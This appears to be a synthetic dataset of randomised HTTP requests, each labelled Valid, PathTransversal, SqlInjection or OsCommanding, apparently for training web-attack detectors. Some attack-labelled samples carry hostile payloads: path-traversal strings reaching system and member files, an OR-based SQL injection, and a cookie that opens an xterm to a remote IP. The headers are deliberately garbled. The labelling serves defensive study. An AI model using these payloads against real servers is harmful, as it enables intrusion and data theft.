d@unlib=teneofofefEm9&syewptaarrit9ti=9652&xEgietptoS=631332877&u-aKrF=tcopynui&g5dierhktls=10&h8oi5=11&lf4HvarxwgetrA-=EswSnde/  l>aphpa&4seerukpnoo=lexa48lttaaofnoaom&en=dobKX48_Z5A&eveeL6iei=sUOLFPgb.APO&dl=aYccx&r2repwsyndt=3&nrrt=889004&6bonta=En1vfst

End - Id: 36837
Start - Id: 10386
class: Valid
GET /FJ0e/ms6it4a9El.pl?e9=asrateniuqeeepi&tehs3teeY=tR&voltrateta6sg=eSWkaFnPX8I&nahnhaoti=tr&AXehLG-b=80119020&huicn53orb=iL_w8EkKDlO&nwsxe=ei-ni&odeehsdfh0auQe=dSaemaadenIdnlOsei&8eeEqqltg=cyh&arrhnnegrn=n7ev%3AoO%25t%5D&_CphpyB6where@mochaR=csd&geeihvsiE=ocsw0oTei4oift&sS=entciwsndhoi4n&6ji=vbn&ouaftahSh=gateX7%29+%5B+ HTTP/1.0
Host: www.lsfs8s2z.gov:286
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.0, x-mac-chinesetrad, euc-kr
Accept-Encoding: gzip, deflate, deflate;q=0.7
Accept-Language: nsrii-rt, rZiSlePu-d
Cache-Control: only-if-cached
Client-ip: 121.244.123.161
Cookie: ood=br9qcrkarti;tumrcyp=70;siiseoilhtor=aGqQRursH-y;nna=rcnhwviaE9rld
Cookie2: $Version="123"
Date: Fri, 10 Nov 06 16:33:12 UTC
ETag: W/"JOu_RzrzlJ3SzYKaE"
Expect: 100-continue
From: miNkcO@dkleaiiild.de
If-Modified-Since: Fri, 18 Jul 08 16:19:56 UTC
If-Unmodified-Since: Fri, 16 Jun 06 24:22:25 UTC
If-Match: *
If-None-Match: "-cf3.u5IgrPSypcFk"
If-Range: *
Max-Forwards: 567
MIME-Version: 3.9
Pragma: T1oeee='OrLy'
Proxy-Authorization: NTLM aDlybkFhaXMwbGlEZWlpcjdabUwzbnVuYTNldGZlSHNzTw==
Authorization: NTLM dGhOSHJkalFlZW1lbGVzZHlnbXA1bEVuZWFwNWVSc2hEYXVmOWJhdXQ3OA==
Range: 4-09953,-7815
Referer: http://www.oioto.de/XreUgwi/tnltgh/medza/RcAn.asp
TE: deflate;q=0.5,chunked,trailers
Trailer: Accept
User-Agent: ueeXptrehahserdie
UA-CPU: MIPS
UA-Disp: 6128,5212,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: HTTP/7.3 www.oh8a.jpg
Transfer-Encoding: deflate
Upgrade: 2el/9.8, wsuo/3.5, dcYo1t/6.3
Warning: 822 228.131.4.69:6209 "vi23tean7alO" "Wed, 02 Dec 09 09:57:23 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10386
Start - Id: 31837
class: Valid
GET /wrknrEl3itoueyjiyina/eIfibg/e@boRPegjZQNFxOx_2.q/eEw8s0l/aACs2v2/u2n/voweEhnesrhh/nAwXe76LI.jpeg?aotsgcse8t=eN7&hayEv=ptmpTnn HTTP/1.1
Host: www.xHvSehw.uk
Connection: close
Accept: */*
Accept-Charset: iso-8859-15;q=0.8, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: drrmtg-86no;q=0.0
Cache-Control: no-cache
Client-ip: 111.91.155.175
Cookie: MNep=9973692
Cookie2: $Version="945"
Date: Wed, 16 Apr 08 19:40:36 CET
ETag: W/"gde8Dk70UHJfStlf"
Expect: oewsn74
From: tte0c@9tOsemgp.be
If-Modified-Since: Wed, 06 May 09 10:23:25 UTC
If-Unmodified-Since: Wed, 09 Aug 06 04:20:04 UTC
If-Match: *
If-None-Match: "4h5TMkv2Nt4fg@rx"
If-Range: *
Max-Forwards: 0461
MIME-Version: 4.6
Pragma: t=sTyarbyo
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: Thtifc rinsbhra=atiD
Range: -86
Referer: /htttgb/dU8fuj/dm2tiel/ltCys.jpeg
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/2.2 (X11; U; Linux i386 1.2; rb-ln; rv:5.5.0) Gecko/74210637
UA-CPU: MIPS
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2241x014
Via: 3.4 24.177.238.90
Transfer-Encoding: compress
Upgrade: qa5i/7.3, DTs/6.0, haoaax/2.5, meeac6/4.7, ic6ntw/3.1
Warning: 195 19.136.88.173 "i5lytaiwejOlo" 
X-Forwarded-For: 50.243.79.16
X-Serial-Number: 69375200108238652611
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31837
Start - Id: 44973
class: PathTransversal
GET /fTbHBi/i29Iy-csXf/s1b51EmDrfy4LowS3i/osggApUHs21./bxarhy/oLf3ttc7ErgrAetmdEa/oieSaiharertdNonwas/inseNg3qyi7OE/eVMivOMqT-nDm/tEnJ.1OZHd8gEfJ-Ehu/rzQOL.cfm?zi=%28ef&aa6a1rsnmirbt=nhs&iitds=8319&LI@var-Npasswdv6HP=5611144&ntt0tr1vnNtroO=ysekoemw&cEemwgetdKKQ=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&4ugAs5onImmoon=eBVWe7&uUstdinopt=d&e1gy41=3334&oa=p3097o2i.hmu HTTP/1.1
Host: 223.94.3.101
Connection: rsain
Accept: text/*, video/*, image/*
Accept-Charset: iso-8859-5;q=0.8, x-mac-turkish, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 81.141.204.248
Cookie: qlemkone=001286
Cookie2: $Version="54"
Date: Mon, 01 Jun 09 02:57:20 UTC
ETag: "NFwIQBsA9AL9_999R"
Expect: awgewyl
From: 3srmpro4@bnhd9wr.de
If-Modified-Since: Fri, 21 Oct 05 02:31:43 CET
If-Unmodified-Since: Mon, 25 Oct 04 06:00:42 UTC
If-Match: "1PKjliFUbeDC_p5py5c"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 72
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM b1BhTG9venJuT0F5dGtlaWVpc251YXZudGNhUmtldG9qQXM=
Authorization: NTLM bGltYXgwZW9laTBoc3NybVRoYWVzZHNhc3NsdDhvZEhlYWt0ZmRkaXRkZXhk
Range: -972278
Referer: /eihr.jpg
TE: trailers,trailers
Trailer: Accept
User-Agent: 7tewe57l (r0qsZR; mZYGRO; r7TkRy9; iqYpUD; t8gfMnX_)
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: FTP/4.0 197.14.21.17
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 941903
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44973
Start - Id: 45426
class: PathTransversal
POST /mE/l6BU/SeU4o8N0rtrow80eg/mjhgitE/yCiK1pD2SiO5LS/4Gyil7ogw/bx6saoasy_qCT0pfaawZ/WOjznAObhZkC/p@YZe7fHPat0e7iC-s1/y@bZmpH0Vtj-s5t3Nx7.css? HTTP/1.0
Content-Length: 237
Content-Language: T,st12ittO
Content-Encoding: identity
Content-Location: /0eai7.rar
Content-MD5: cnRtaWxoTnNteWRwZWFzeA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: 246.26.244.167
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=22
Client-ip: 202.38.83.201
Cookie: 0wnl=hx9d;ao2b=9529913;ext=08tim@X_FHh9;saynhxbetEuors=rZ-08a;meca=evssolahed
Cookie2: $Version="494"
Date: Thu, 24 Feb 05 04:53:37 GMT
ETag: "UbAFqweMK2mBj2hU"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 26 Jul 08 22:50:42 GMT
If-Unmodified-Since: Sat, 08 Dec 07 18:36:03 UTC
If-Match: "UEz5I0Gr9q@D7yhf"
If-None-Match: "U-QKSS5sajU.uE.OSr"
If-Range: "h43ZGVP1a-HOJYZ@eTYM"
Max-Forwards: 02
MIME-Version: 7.1
Pragma: o1rsU=thle
Proxy-Authorization: Digest nc=F3B4A20E
Authorization: Digest cnonce="jmnyne"
Range: -292636,082693-
Referer: http://www.aseoyd.ch/rsIM/idtt.jpg
TE: gzip;q=0.5,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.5 (compatible; MSIE 6.2; Solaris; heos0s8ch; sloh; WnuMsmoIso)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: 8.5 www.m6dnesI.shtml:4938, 3.8 www.heu3kora.png, 9.3 www.euebVoe.png
Transfer-Encoding: gzip
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 685 www.notm7.js "acehl3taE" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tPrehnwsasdve=ua&atonjnref7ofen= &or6eo=alldLms&eih=../../../../../../../../../WINNT/autoexec.bat&2eoohzu=6608&O4SI5t0G-c=emIQ6BF_m3&2tUntmubW=1790987756&3DLZO=n%entrMhkucrALsamxp_t&rsdmxoeeisrte=00&im46Spe1c0Lnn=11

End - Id: 45426
Start - Id: 32713
class: Valid
POST /sLIJlbs02TnkQx4/I@img8services/ih_I.IkNFatYC_XQg3l/UmiTD36u6Xsf/br4b06GIOLA3/_3RpnetcatO8VKfromX29null.exe? HTTP/1.0
Content-Length: 264
Content-Language: 1sau
Content-Encoding: gzip
Content-Location: http://9emm9.net/leTr/s9aehi/oiseoh0.mpg
Content-MD5: ZXNsYkVjaW5ueW9lbmN1bg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 13:14:52 GMT
Last-Modified: Thu, 03 Mar 05 17:02:56 UTC
Host: www.2nT9.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.2
Cache-Control: min-fresh=05326
Client-ip: 101.244.183.55
Cookie: 6tlegSfuhzeyE=nLOscriptedo-o0
Cookie2: $Version="09"
Date: Thu, 01 Apr 10 12:11:17 CET
ETag: W/"Z-E63Eov10fSRQJm"
Expect: 100-continue
From: kRoi@pan3ci.biz
If-Modified-Since: Tue, 08 May 07 24:25:03 GMT
If-Unmodified-Since: Thu, 16 Feb 06 05:57:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: wi7ear oNnaa=i4e1
Authorization: NTLM YWFoZUF6YmVFaHRveFZtb29obWRxZ2FkZWhyd2VlYXN1YTg0eWVscnNOcGhF
Range: -512,-944936
Referer: http://oes6.gov/r0bfe/r1hosr/idsiro/tnprc3.exe
TE: chunked;q=0.8,trailers
Trailer: Pragma
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 7.1; oh-eh; rv:6.4.1) Gecko/69230841
UA-CPU: MIPS
UA-Disp: 6104,859,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1210x8264
Via: cGtde/5.2 155.107.52.79
Transfer-Encoding: compress
Upgrade: nGneie/0.4, rwa/5.5, cia/6.0, teo/0.3
Warning: 971 www.nreie.html:86955 "sootstDgebnbLaecv" 
X-Forwarded-For: 67.157.122.212
X-Serial-Number: 5962543728498976504
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

hza7exMuAsr=64251491&yee=9M5uxpxbJ0WM&ncraepaibgg1=2568233&emMd8lo4td= =y&oe=WS copydpol0aemochaawpeacceptn&nOapersoyier=i&D9tgez7Sunauy3=eAlc;&intasrrarbce2sh=tMzr4libmdpobeqe&aoeisei0vvtae=3670836&eTtoozenleoeue=01491382&oisesiuhsmeP=434325&xPE0-=eiat8rnesdf

End - Id: 32713
Start - Id: 4751
class: Valid
POST /fxS6P/o@ZZu58RYJ@Ufu/igju2H3axGk/bilgWUec7/mrzuNGHaK/mcrs/imXPS/vS/hstirNaTom.js? HTTP/1.0
Content-Length: 75
Content-Language: Bese,g01eer
Content-Encoding: identity
Content-Location: http://www.2titu.be/eaaytwic/arrmIsic/slneuf.txt
Content-MD5: ODV1cGlqTzhlYTZmaXRxZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Nov 05 07:51:39 UTC
Last-Modified: Sat, 05 May 07 12:40:33 GMT
Host: 15.8.173.68:80
Connection: siasnso
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: daeA-nniV;q=0.0, cp-s, jNjw4Hix-Ecz;q=0.5, r-eehbd
Cache-Control: only-if-cached
Client-ip: 133.157.176.125
Cookie: rorvmNtL8=nm4Setnysoe;3imysntdrwHiAi=nho;Y7=0;hiieelet=y:Ep+snhdmtejIiz;ew0atcUs=3imD;osOslchqiwom=4
Cookie2: $Version="9"
Date: Fri, 28 Apr 06 12:57:38 GMT
ETag: W/"3shGgvi.8HPw45K"
Expect: tcge
From: jitrD@e9sseiqt.uk
If-Modified-Since: Sat, 21 Nov 09 14:47:29 UTC
If-Unmodified-Since: Sun, 29 Apr 07 11:05:07 UTC
If-Match: "g1Kd3dZzGf@Sv1ZgN"
If-None-Match: *
If-Range: Mon, 06 Jul 09 23:30:50 GMT
Max-Forwards: 78
MIME-Version: 3.0
Pragma: houPcotn=eehwie
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: NTLM aWVtcnpTaTZ0VDVsb3Nwb0VuSW9yTGJzbmw2MmllaWlndDkz
Range: -9054
Referer: http://r6mf5.de/elTssar/tl0le.mpeg
TE: gzip,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 9.4; er-t8; rv:6.0.6) Gecko/69020103
UA-CPU: MIPS
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4366x138
Via: 1.4 www.ebOf.tiff, 3.9 187.220.212.219, 6.7 54.182.250.144
Transfer-Encoding: identity
Upgrade: tnvs/0.0, hpfm/8.3, dtti/3.8
Warning: 345 18.66.75.142 "egj3Lsf4olmsnle" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 95806492
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8E=Wiion&Csj3=28&Shql9iyaUn3cje6=nhH&w6S0a7RA=so1pGHIirr&avoglBvht6A=810862

End - Id: 4751
Start - Id: 26594
class: Valid
GET /1etdo27qsrctf.png?nsdeeetI=tsEg&Snrhtc=1069&esfunrw=Ni&noibidrlvyro3=245249&0YLBwq=iOe&qQwnc_Zprocessing-instructionj.=1&Ag2ieethVhkl=egstcexecalpttsiu+wrb%3A&nitdrus8o=nr%3Eipsp6%3E-&rr1o=aehetnuMigxi&05wPp4l.oue=between4alinkmt%26o&paEtrbvhdNhumi=iz&tcyjnjn=Mn&ti6ijie=tl9&tli8q=xanYAc HTTP/1.1
Host: 241.47.131.217
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, identity
Accept-Language: *;q=0.9
Cache-Control: h=6h
Client-ip: 228.234.165.65
Cookie: tQsqh=25145911;toFrwlOa=sR/e n;Kslibtl3K;hw=fkAaeuyn4aaa;ye9r=nomttlttybdiolr
Cookie2: $Version="708"
Date: Fri, 25 Jul 08 12:44:44 CET
ETag: W/"oTArCAOdK_hJSEWM3kO"
Expect: 100-continue
From: aucneam2@riewaCaudy.st
If-Modified-Since: Tue, 29 Jul 08 06:26:45 GMT
If-Unmodified-Since: Wed, 21 Jul 04 06:06:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 2.5
Pragma: lcih=c6
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic dHhJbmFNOmNobm9EMw==
Range: 12361-,4-
Referer: /wnanx/6drne/zt6peoHn/thlc75t.txt
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 9.6; er-ot; rv:5.8.0) Gecko/53219317
UA-CPU: Sparc
UA-Disp: 927,0967,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 335x343
Via: 5.0 www.leettr.png, HTTP/2.7 174.5.96.178
Transfer-Encoding: tnpon
Upgrade: zIHnm/4.6, I4l/5.6, hae/9.1, cflau/8.1
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 220.222.195.180
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26594
Start - Id: 42122
class: SqlInjection
GET /nHz/ffentTig0crtEpdhnc.gif?d2bhfaea=898&he=4571068&snwtaltIs=exi%27On1&rlonssTkntwm=adk&itnlenKs3fe8=%27++OR+++%27drtdj4p%27+++++%3C++%27X&e4eaEgoadsdsTe=8wa&00346=o7xmlo&i@mo=gatao&er=84&aB=655034508&cT2cp6pr=Aoseeddnxhreuq HTTP/1.1
Host: 230.68.209.113
Connection: close
Accept: audio/*, text/*;q=0.6, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.5, deflate
Accept-Language: t-0rHemue, ycsutr-ilwdetz;q=0.2, pii-z;q=0.3
Cache-Control: only-if-cached
Client-ip: 209.54.39.204
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Thu, 28 Jul 05 17:01:15 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: stgPOeE@DeaasWp.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:29:55 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Jun 09 17:42:16 UTC
Max-Forwards: 513
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: nerr ixhz=e7ivri
Range: 80-3804,023297-91,09-
Referer: http://esla.net/kTiesl/eOGt/auitako.png
TE: trailers
Trailer: Proxy-Authorization
User-Agent: lYsk8t8e3/4.0.6
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1285x9347
Via: 1.5 www.hao5se.jpg, oape/2.8 www.elob7ps.jpeg, FTP/8.6 www.hcut.png
Transfer-Encoding: compress
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42122
Start - Id: 32904
class: Valid
PUT /6omivu/ik_ICVqm/owsknotftN0nBra/eBqr6J/aes76r/yrD19JUk1-eI81.jsp? HTTP/1.1
Content-Length: 268
Content-Language: tinyhtrm,e
Content-Encoding: gzip
Content-Location: http://tssaCwei.ch/rreh/Oasrapf/cr0ert/bze6r/daRee5l2.swf
Content-MD5: c05rbzJvZXU2cmVmMGdtcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Nov 06 09:14:21 GMT
Last-Modified: Fri, 07 Oct 05 16:05:22 CET
Host: 126.2.129.42
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t1aolS-glpleoa;q=0.7, ivfe33tg-u5item0h;q=0.3, TDsnsd-not
Cache-Control: yeama=cea
Client-ip: 80.69.27.122
Cookie: Td=qlLsiio;FXW21EL.5gIj=ajv19nr0oH8;RTxperluoD=te
Cookie2: $Version="65"
Date: Tue, 01 Jun 04 15:09:12 GMT
ETag: "vBgaOd7-rIh2Bru"
Expect: 100-continue
From: Qtafer@rrotHx.be
If-Modified-Since: Tue, 19 Jun 07 06:35:18 CET
If-Unmodified-Since: Wed, 23 Jan 08 06:57:42 UTC
If-Match: *
If-None-Match: "SxTWkP2qiOxsaViWwPx"
If-Range: Sat, 01 May 04 06:48:36 UTC
Max-Forwards: 71
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oiAtpy"
Authorization: rovb eete=ocorab59
Range: -11
Referer: /scY99/hwggt/arni/jjkoss2e.cgi
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 9.8; ld-en; rv:0.7.6) Gecko/28620911
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 329x9212
Via: ihrew/0.1 www.htpt.jpeg:9891, FTP/1.9 88.67.6.123:22
Transfer-Encoding: compress
Upgrade: aheCmt/9.7, Inkyrg/1.8, f5etTs/9.5
Warning: 506 www.swAiTa.shtml "moTrbi" "Sun, 22 Oct 06 24:26:51 CET"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eunoIhuQet=3&niEt9aahtttsed=ee:cecnemetaiwdE&fBCMdivbin.0zzK=pszhsaanetlaosasd&r9hnnyrseasen=dde&vsichrtoeetnau=340706129&ole2=6&JwI8XXsam=91778&H1lopNte=ayCLxnT&odttahsStaigrq=nLi430&D@4m-sJFS=mochaf&eu32ite=eGS0xjkgy&Anldanldigle3n=lNs7JG5E6yM&M@Z6=cqel5ln5nC1swyi

End - Id: 32904
Start - Id: 24594
class: Valid
GET /0obORinoddel.htm? HTTP/1.0
Host: 229.209.4.70
Connection: close
Accept: text/xml;q=0.2, image/gif
Accept-Charset: x-mac-greek, macintosh;q=0.6, iso-8859-8;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 144.153.248.99
Cookie: ynaOaetepss4=0;=xEscriptg i|mlib/
Cookie2: $Version="1"
Date: Wed, 04 Aug 04 02:34:49 CET
ETag: W/"4dS.u20O0Z3P8h."
Expect: eeEemis
From: naao@dsGtaOrc0.net
If-Modified-Since: Mon, 17 Dec 07 02:49:44 UTC
If-Unmodified-Since: Wed, 29 Mar 06 21:50:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Dec 08 05:30:56 GMT
Max-Forwards: 5
MIME-Version: 8.0
Pragma: c8zI5='in3en'
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: /rwebsfr/n9eE/ob8ueo.jsp
TE: trailers,chunked,deflate;q=0.1
Trailer: Host
User-Agent: tpc9ixlH (ioP@M75)
UA-CPU: StrongARM
UA-Disp: 1118,7867,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 699x848
Via: 2.9 www.gGdEjLh8.gif
Transfer-Encoding: nee3rt; s96e1=rOdrea
Upgrade: FNHpie/1.6, stqE/9.5, mlak/3.1
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24594
Start - Id: 27177
class: Valid
GET /isGpgZqauEh/xOQNRllSjnwDtIPnvvT/ad_99Yxm-/e5at0eeiEeiwi/eo2Bjf-sT/rZ@/fuornBb03-S_x4/r87pwzrkDqvul7/G4divTg.gif?emItG78e=840841441&pa4ndeptua=28&cblwalmeiwa=hwhere%3EdskrcAf%3B&dae6ofaS=255&ac=7387655&feev=D%7E%5B HTTP/1.0
Host: 64.11.187.74
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ns-inhl5;q=0.2, C-9ma5;q=0.6, tbZh-onn, BltS5to-ncaIm5eh, hdne-idanuh3o
Cache-Control: no-store
Client-ip: 30.130.235.21
Cookie: etelde=rphp;_Yhn=3;tnetnPtseae4d=xo;tslt=44164;iltrirIXsp=2052;.perl5ftpEiDls=|inputVwgetikt
Cookie2: $Version="9"
Date: Fri, 24 Oct 08 11:13:26 GMT
ETag: "G@QbMBly6v5UAVTgSi"
Expect: 100-continue
From: NnNme@unaivpat.ch
If-Modified-Since: Tue, 09 Jan 07 15:12:00 CET
If-Unmodified-Since: Sat, 01 Nov 08 22:50:07 GMT
If-Match: "TL9wcdfaej5MFfDvDYKZ"
If-None-Match: *
If-Range: Sat, 13 Jun 09 11:45:56 CET
Max-Forwards: 9167
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Digest nc=400a60cB
Range: 23428-078577
Referer: /euLepkxe/aarenmao/6t5wr/wZgouths/dlode9n.fgf
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 5.3; ei-Rm; rv:3.6.1) Gecko/99139370
UA-CPU: MIPS
UA-Disp: 347,7317,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3319x950
Via: Mkdre/8.9 www.eaAjtl.png:29, 8.3 177.167.6.104, FTP/5.2 www.oerDy.html
Transfer-Encoding: gzip
Upgrade: Etiah/8.1, hsg/1.5
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 437437535
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27177
Start - Id: 14827
class: Valid
GET /td8oesjDthieodsaBoe9/ptlafs/pagth3onuoduagnTattn/crmatterricqrbrbSceh/nnUaJhmbMdMaRONWX/nMpz0sock_streamAJ9-/sJfimSjrUuzvtd/Hu_m./tiuaet.js? HTTP/1.0
Host: www.eepxhJ.fr
Connection: close
Accept: text/plain;q=0.2, text/*
Accept-Charset: windows-1255;q=0.0, windows-1258
Accept-Encoding: *
Accept-Language: *
Cache-Control: nit7aa=llts
Client-ip: 35.5.220.119
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="522"
Date: Sat, 02 Dec 06 18:25:05 UTC
ETag: W/"Qt6__j8ZaLy@bPXJiWRa"
Expect: 100-continue
From: 7dmt3haa@civb.net
If-Modified-Since: Sun, 13 Dec 09 16:58:39 GMT
If-Unmodified-Since: Wed, 26 Sep 07 21:07:19 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Apr 09 15:50:06 GMT
Max-Forwards: 020
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: niosi tjsll=y4sneodh
Authorization: Digest nc=2B603323
Range: 43-,13433-8
Referer: /1pbi/ehp8eocd.jpg
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: gFyW.CXbBq http://www.pmNenJnt.ch
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 923x8805
Via: FTP/7.1 www.ieeruo.html, eny7/6.3 www.toeyct.htm:09426
Transfer-Encoding: compress
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14827
Start - Id: 43644
class: OsCommanding
PUT /4_7Lf6eqW8RTXYVhrEE/ixde9/logkQJVEccopyQkLHJ_/pxtelnetyWyUrDg4/idEz1cl/elsrTdzrHbbgewk/rbrpiadea/2I4TI2b2FzNfGA.gif? HTTP/1.0
Content-Length: 174
Content-Language: adcid7ot,b
Content-Encoding: identity
Content-Location: /gti9.tar
Content-MD5: cjBoZGxoZW90cm1hbXdldg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Mar 08 02:17:52 CET
Last-Modified: Tue, 13 Nov 07 16:35:32 UTC
Host: www.nlje.fr:80
Connection: keep-alive
Accept: image/*;q=0.6, video/mpeg;q=0.5
Accept-Charset: windows-1251;q=0.4, x-mac-turkish, x-mac-roman
Accept-Encoding: 
Accept-Language: y-uhiEzo, cO-shenm, i-fhvOreE
Cache-Control: no-cache
Client-ip: 43.7.143.107
Cookie: 4erusnrNrndtzeA=71;0ayetescadDc=\r xterm   -display  168.246.60.209:0.0;deiNr9hthe=849571440
Cookie2: $Version="737"
Date: Thu, 20 Aug 09 04:43:59 UTC
ETag: "DFz6-wVe0KJh44gKH5u"
Expect: 100-continue
From: stteA4ju@2lnVxdh.ch
If-Modified-Since: Sat, 12 Feb 05 21:18:26 CET
If-Unmodified-Since: Tue, 10 May 05 18:02:12 UTC
If-Match: "1XZ1OOC7wNACCvJT"
If-None-Match: "SkHKbQKxH9_75crNam"
If-Range: Mon, 22 Mar 04 18:12:38 UTC
Max-Forwards: 63
Pragma: udmssusr='R8dt'
Range: 3033-,1431-72,33-
Referer: http://www.osopvmet.be/7zddAk.php4
